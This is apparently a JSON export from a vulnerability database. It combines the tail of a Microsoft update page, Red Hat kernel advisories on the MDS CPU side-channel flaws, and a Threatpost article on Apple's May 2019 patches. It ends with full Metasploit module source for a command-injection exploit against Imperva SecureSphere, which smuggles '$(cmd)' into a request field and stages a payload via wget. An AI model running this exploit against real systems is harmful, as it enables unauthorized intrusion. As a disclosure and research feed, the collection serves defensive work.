href=\"http://www.catalog.update.microsoft.com/home.aspx\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>.</p><p><strong>Install this update</strong></p><p>This update will be downloaded and installed automatically from Windows Update. To get the standalone package for this update, go to the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://catalog.update.microsoft.com/v7/site/Search.aspx?q=KB4494441\" managed-link=\"\" target=\"_blank\">Microsoft Update Catalog</a>\u00a0website.</p><p><strong>File information</strong></p><p>For a list of the files that are provided in this update, download the\u00a0<a data-content-id=\"\" data-content-type=\"\" href=\"http://download.microsoft.com/download/A/2/C/A2CB22DA-EEEF-49E5-9F1F-674AFD365436/4494441.csv\" managed-link=\"\" target=\"_blank\">file information for cumulative update 4494441</a>.\u00a0</p></div></body></html>", "modified": "2019-06-19T18:48:54", "id": "KB4494441", "href": "https://support.microsoft.com/en-us/help/4494441/", "published": "2019-06-19T18:48:38", "title": "May 14, 2019\u2014KB4494441 (OS Build 17763.503)", "type": "mskb", "cvss": {"score": 4.7, "vector": "AV:L/AC:M/Au:N/C:C/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:05", "bulletinFamily": "unix", "description": "The kernel-rt packages provide the Real Time Linux Kernel, which enables fine-tuning for systems with extremely high determinism requirements.\n\nSecurity Fix(es):\n\n* A flaw was found in the implementation of the \"fill buffer\", a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer. (CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the 'processor store buffer'. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU's processor store buffer. (CVE-2018-12126)\n\n* Microprocessors use a \u2018load port\u2019 subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU\u2019s pipelines. Stale load operations results are stored in the 'load port' table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel. (CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. (CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function (CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET implementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: FPU state information leakage via lazy FPU restore (CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* update the MRG 2.5.z 3.10 kernel-rt sources (BZ#1692711)", "modified": "2019-05-15T00:21:15", "published": "2019-05-15T00:16:01", "id": "RHSA-2019:1190", "href": "https://access.redhat.com/errata/RHSA-2019:1190", "type": "redhat", "title": "(RHSA-2019:1190) Important: kernel-rt security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:39", "bulletinFamily": "unix", "description": "The kernel packages contain the Linux kernel, the core of any Linux operating system.\n\nSecurity Fix(es):\n\n* A flaw was found in the implementation of the \"fill buffer\", a mechanism used by modern CPUs when a cache-miss is made on L1 CPU cache. If an attacker can generate a load operation that would create a page fault, the execution will continue speculatively with incorrect data from the fill buffer while the data is fetched from higher level caches. This response time can be measured to infer data in the fill buffer. (CVE-2018-12130)\n\n* Modern Intel microprocessors implement hardware-level micro-optimizations to improve the performance of writing data back to CPU caches. The write operation is split into STA (STore Address) and STD (STore Data) sub-operations. These sub-operations allow the processor to hand-off address generation logic into these sub-operations for optimized writes. Both of these sub-operations write to a shared distributed processor structure called the 'processor store buffer'. As a result, an unprivileged attacker could use this flaw to read private data resident within the CPU's processor store buffer. (CVE-2018-12126)\n\n* Microprocessors use a \u2018load port\u2019 subcomponent to perform load operations from memory or IO. During a load operation, the load port receives data from the memory or IO subsystem and then provides the data to the CPU registers and operations in the CPU\u2019s pipelines. Stale load operations results are stored in the 'load port' table until overwritten by newer operations. Certain load-port operations triggered by an attacker can be used to reveal data about previous stale requests leaking data back to the attacker via a timing side-channel. (CVE-2018-12127)\n\n* Uncacheable memory on some microprocessors utilizing speculative execution may allow an authenticated user to potentially enable information disclosure via a side channel with local access. (CVE-2019-11091)\n\n* kernel: Buffer overflow in firewire driver via crafted incoming packets (CVE-2016-8633)\n\n* kernel: crypto: privilege escalation in skcipher_recvmsg function (CVE-2017-13215)\n\n* Kernel: ipsec: xfrm: use-after-free leading to potential privilege escalation (CVE-2017-16939)\n\n* kernel: Out-of-bounds write via userland offsets in ebt_entry struct in netfilter/ebtables.c (CVE-2018-1068)\n\n* kernel: Use-after-free due to race condition in AF_PACKET implementation (CVE-2018-18559)\n\n* kernel: media: use-after-free in [tuner-xc2028] media driver (CVE-2016-7913)\n\n* kernel: Out-of-bounds access via an XFRM_MSG_MIGRATE xfrm Netlink message (CVE-2017-11600)\n\n* kernel: memory leak when merging buffers in SCSI IO vectors (CVE-2017-12190)\n\n* kernel: Unallocated memory access by malicious USB device via bNumInterfaces overflow (CVE-2017-17558)\n\n* Kernel: KVM: DoS via write flood to I/O port 0x80 (CVE-2017-1000407)\n\n* Kernel: FPU state information leakage via lazy FPU restore (CVE-2018-3665)\n\nFor more details about the security issue(s), including the impact, a CVSS score, acknowledgments, and other related information, refer to the CVE page(s) listed in the References section.\n\nBug Fix(es):\n\n* rwsem in inconsistent state leading system to hung (BZ#1690321)\n\n* efi_bgrt_init fails to ioremap error during boot (BZ#1692284)", "modified": "2019-05-14T22:49:05", "published": "2019-05-14T22:09:09", "id": "RHSA-2019:1170", "href": "https://access.redhat.com/errata/RHSA-2019:1170", "type": "redhat", "title": "(RHSA-2019:1170) Important: kernel security and bug fix update", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}], "threatpost": [{"lastseen": "2019-12-06T07:13:36", "bulletinFamily": "info", "description": "Apple has rolled out 173 patches across in various products across its hardware portfolio, including for dangerous bugs in macOS for laptops and desktops, iPhone, Apple TV and Apple Watch.\n\nThe update also includes a patch for the side-channel vulnerabilities in Intel chips [disclosed on Tuesday](<https://threatpost.com/intel-cpus-impacted-by-new-class-of-spectre-like-attacks/144728/>), which open the door to the attack vectors collectively dubbed \u201cZombieLoad.\u201d\n\nAll Mac laptops stretching back to 2011 are affected by the Intel flaws.\n\n## Side-Channel Flaw\n\nOf particular note in the massive update is a patch for four side-channel bugs that affect the microcode of macOS Mojave 10.14.4 (CVE-2018-12126, CVE-2018-12127, CVE-2018-12130 and CVE-2019-11091).\n\nThese impact load ports, fill buffers, and store buffers in systems with microprocessors utilizing speculative execution. They stem from side-channel vulnerabilities, dubbed Microarchitectural Data Sampling (MDS), impacting all modern Intel chips. Attackers could use speculative execution to potentially leak sensitive data from a system\u2019s CPU.\n\n[](<https://threatpost.com/newsletter-sign/>)\n\n\u201cAn attacker with local user access to potentially enable information disclosure via a side channel,\u201d according to the [Apple advisory](<https://support.apple.com/en-us/HT210119>). \u201cMultiple information-disclosure issues were addressed partially by updating the microcode and changing the OS scheduler to isolate the system from web content running in the browser.\u201d\n\nThe [four different attack vectors](<https://cpu.fail/>) are dubbed ZombieLoad, Fallout, RIDL (Rogue In-Flight Data Load) and Store-to-Leak Forwarding, and have been detailed and publicly disclosed on Tuesday by an array of security researchers.\n\nTo completely address these issues, there are additional [opt-in mitigations](<https://support.apple.com/kb/HT210107>) to disable hyper threading and enable microcode-based mitigations for all processes by default.\n\n## iOS 12.3 Update (42 Fixes)\n\nApple has also rolled out a [cornucopia of patches](<https://support.apple.com/en-us/HT210118>) for iPhone 5s and later, the iPad Air and later, and the sixth-generation iPod touch.\n\nThe most severe are bugs that are also present in the Apple Watch. These include flaws in the kernel (CVE-2019-8605) that would allow a malicious application to execute arbitrary code with system privileges on a target device. It\u2019s a use-after-free issue that was addressed with improved memory management.\n\nAnother shared flaw with Apple Watch is a use-after-free issue in the Mail Message Framework (CVE-2019-8613), which would allow a remote attacker to cause arbitrary code execution. And in MobileLockdown, a malicious application may be able to gain root privileges thanks to an input validation issue (CVE-2019-8637).\n\nYet another flaw shared with Apple Watch (CVE-2019-8620) would allow a device to be passively tracked by its Wi-Fi MAC address.\n\nAside from these, also interesting is a Lock Screen logic problem (CVE-2019-8599) that would allow a person with physical access to an iOS device to see the email address used for iTunes.\n\nAn input validation bug (CVE-2019-8626) in the Mail function meanwhile could lead to denial of service. An attacker could exploit this by sending the target victim a maliciously crafted mail message.\n\nOther patches address vulnerabilities that could be exploited to achieve everything from privilege escalation and escaping sandboxes to overwriting files and information disclosure.\n\n## Safari 12.1.1 Update (21 Fixes)\n\nApple also patched [multiple flaws](<https://support.apple.com/en-us/HT210123>) in the operating systems that power its Macbooks and desktops: macOS Sierra 10.12.6, macOS High Sierra 10.13.6 and macOS Mojave 10.14.5 are vulnerable. All of the bugs are in WebKit, and they can all be exploited via processing maliciously crafted web content.\n\nOne flaw is an out-of-bounds read vulnerability (CVE-2019-8607); and there are also 20 different memory-corruption issues that may lead to arbitrary code-execution. Apple didn\u2019t provide further details.\n\n## tvOS 12.3 Update (35 Fixes)\n\nThe Apple TV 4K and Apple TV HD platforms meanwhile are [riddled with vulnerabilities;](<https://support.apple.com/en-us/HT210120>) 35 of them in all.\n\nMost of them are memory corruption issues (a total of 20) that could allow arbitrary code-execution via maliciously crafted web content.\n\nAnother two memory bugs (in AppleFileConduit, CVE-2019-8593 and in sysdiagnose, CVE-2019-8574) could allow an application to execute arbitrary code with system privileges.\n\nThree bugs were patched in the kernel: A use-after-free issue (CVE-2019-8605) that could lead to arbitrary code-execution with system privileges; an out-of-bounds read (CVE-2019-8576) that could allow a local user to cause unexpected system termination or read kernel memory; and a type confusion issue (CVE-2019-8591) that could allow an application to cause unexpected system termination or write kernel memory.\n\nAlso notable is an out-of-bounds read that could lead to arbitrary code execution in CoreAudio (CVE-2019-8585); and in MobileLockdown, a malicious application may be able to gain root privileges thanks to an input validation issue (CVE-2019-8637).\n\n## watchOS 5.2.1 Update (21 Fixes)\n\nApple Watch Series 1 and later has [a slew of issues](<https://support.apple.com/en-us/HT210122>), many shared with non-updated versions of iOS.\n\nThe most severe of the bunch include a memory corruption issue CVE-2019-8593 in the AppleFileConduit component that could allow an application to execute arbitrary code with system privileges; and an out-of-bounds read bug (CVE-2019-8585) in CoreAudio allowing a maliciously crafted movie file to lead to arbitrary code execution.\n\nThere are also three vulnerabilities in the kernel: A use-after-free issue (CVE-2019-8605) that would allow a malicious application to execute arbitrary code with system privileges (also fixed in iOS); an out-of-bounds read (CVE-2019-8576) that would allow a local user to cause unexpected system termination or read the kernel memory; and a type confusion issue (CVE-2019-8591) that would allow a malicious application to cause unexpected system termination or write kernel memory.\n\nWatch also suffers from the same use-after-free bug in the Mail Message Framework (CVE-2019-8613) that allows remote code-execution; this is also fixed in the iOS update.\n\nAnd, also fixed is the user-privacy issue present in iOS (CVE-2019-8620) that would allow a device to be passively tracked by its Wi-Fi MAC address.\n\n## Apple TV Software 7.3 Update (3 Fixes)\n\nAnd finally, the third-generation Apple TV has [three vulnerabilities](<https://support.apple.com/en-us/HT210121>), existing in both the Bluetooth and Wi-Fi functions.\n\nAn input validation issue in Bluetooth (CVE-2017-14315) could allow a remote attacker to cause an unexpected application termination or arbitrary code execution. And as for Wi-Fi, an attacker within range may be able to execute arbitrary code on the Wi-Fi chip via a memory corruption problem (CVE-2017-9417), or via a stack buffer overflow (CVE-2017-6975)\n\n## Other Fixes\n\nApple also fixed [50 additional vulnerabilities](<https://support.apple.com/en-us/HT210119>) in macOS Mojave 10.14.5; Security Update 2019-003 High Sierra; Security Update 2019-003 Sierra; macOS Sierra 10.12.6; macOS High Sierra 10.13.6; and macOS Mojave 10.14.4.\n\n**_Want to know more about Identity Management and navigating the shift beyond passwords? Don\u2019t miss _**[**_our Threatpost webinar on May 29 at 2 p.m. ET_**](<https://attendee.gotowebinar.com/register/8039101655437489665?source=ART>)**_. Join Threatpost editor Tom Spring and a panel of experts as they discuss how cloud, mobility and digital transformation are accelerating the adoption of new Identity Management solutions. Experts discuss the impact of millions of new digital devices (and things) requesting access to managed networks and the challenges that follow._**\n", "modified": "2019-05-14T21:31:36", "published": "2019-05-14T21:31:36", "id": "THREATPOST:CBFAA2319AF4281EC1DD5C4682601942", "href": "https://threatpost.com/apple-patches-intel-side-channel-ios-macos/144743/", "type": "threatpost", "title": "Apple Patches Intel Side-Channel Bugs; Updates iOS, macOS and More", "cvss": {"score": 7.9, "vector": "AV:A/AC:M/Au:N/C:C/I:C/A:C"}}], "metasploit": [{"lastseen": "2019-11-26T16:28:27", "bulletinFamily": "exploit", "description": "This module exploits a command injection vulnerability in Imperva SecureSphere 13.x. The vulnerability exists in the PWS service, where Python CGIs didn't properly sanitize user supplied command parameters and directly passes them to corresponding CLI utility, leading to command injection. Agent registration credential is required to exploit SecureSphere in gateway mode. This module was successfully tested on Imperva SecureSphere 13.0/13.1/ 13.2 in pre-ftl mode and unsealed gateway mode.\n", "modified": "2019-03-06T03:57:42", "published": "2019-01-08T06:18:04", "id": "MSF:EXPLOIT/LINUX/HTTP/IMPERVA_SECURESPHERE_EXEC", "href": "", "type": "metasploit", "title": "Imperva SecureSphere PWS Command Injection", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HttpClient\n include Msf::Exploit::CmdStager\n\n def initialize(info = {})\n super(\n update_info(\n info,\n 'Name' => 'Imperva SecureSphere PWS Command Injection',\n 'Description' => %q(\n This module exploits a command injection vulnerability in Imperva\n SecureSphere 13.x. The vulnerability exists in the PWS service,\n where Python CGIs didn't properly sanitize user supplied command\n parameters and directly passes them to corresponding CLI utility,\n leading to command injection. Agent registration credential is\n required to exploit SecureSphere in gateway mode.\n\n This module was successfully tested on Imperva SecureSphere 13.0/13.1/\n 13.2 in pre-ftl mode and unsealed gateway mode.\n ),\n 'License' => MSF_LICENSE,\n 'Author' =>\n [\n 'rsp3ar <lukunming<at>gmail.com>' # Discovery/Metasploit Module\n ],\n 'References' =>\n [\n [ 'EDB', '45542' ]\n ],\n 'DisclosureDate' => \"Oct 8 2018\",\n 'DefaultOptions' => {\n 'SSL' => true,\n 'PrependFork' => true,\n },\n 'Platform' => 'linux',\n 'Arch' => [ARCH_X86, ARCH_X64],\n 'CmdStagerFlavor' => %w{ echo printf wget },\n 'Targets' =>\n [\n ['Imperva SecureSphere 13.0/13.1/13.2', {}]\n ],\n 'DefaultTarget' => 0))\n\n register_options(\n [\n Opt::RPORT(443),\n OptString.new('USERNAME', [false, 'Agent registration username', 'imperva']),\n OptString.new('PASSWORD', [false, 'Agent registration password', '']),\n OptString.new('TARGETURI', [false, 'The URI path to impcli', '/pws/impcli']),\n OptInt.new('TIMEOUT', [false, 'HTTP connection timeout', 15])\n ])\n register_advanced_options [\n OptBool.new('ForceExploit', [false, 'Override check result', false])\n ]\n end\n\n def check\n begin\n res = execute_command('id')\n rescue => e\n vprint_error(\"#{e}\")\n return CheckCode::Unknown\n end\n\n if res.body =~ /uid=\\d+/\n return CheckCode::Vulnerable\n end\n\n CheckCode::Safe\n end\n\n def exploit\n unless CheckCode::Vulnerable == check\n unless datastore['ForceExploit']\n fail_with(Failure::NotVulnerable, 'Target is not vulnerable. Set ForceExploit to override.')\n end\n print_warning 'Target does not appear to be vulnerable'\n end\n\n print_status(\"Sending payload #{datastore['PAYLOAD']}\")\n execute_cmdstager\n end\n\n def execute_command(cmd, opts = {})\n data = {\n 'command' => 'impctl server status',\n 'parameters' => {\n 'broadcast' => true,\n 'installer-address' => \"127.0.0.1 $(#{cmd})\"\n }\n }\n\n res = send_request data\n\n return unless res\n\n if res.code == 401\n fail_with(Failure::NoAccess, 'Authorization Failure, valid agent registration credential is required')\n end\n\n unless res.code == 406 && res.body.include?(\"impctl\")\n fail_with(Failure::Unknown, 'Server did not respond in an expected way')\n end\n\n res\n end\n\n def send_request(data)\n req_params = {\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path),\n 'data' => data.to_json\n }\n\n if !datastore['USERNAME'].blank? && !datastore['PASSWORD'].blank?\n unless @cookie\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => normalize_uri('/')\n })\n unless res\n fail_with(Failure::Unreachable, \"#{peer} - Connection failed\")\n end\n\n @cookie = res.get_cookies\n end\n\n req_params['cookie'] = @cookie\n req_params['headers'] = {\n 'Authorization' => basic_auth(datastore['USERNAME'], datastore['PASSWORD'])\n }\n end\n\n send_request_cgi(req_params, datastore['TIMEOUT'])\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/http/imperva_securesphere_exec.rb"}]}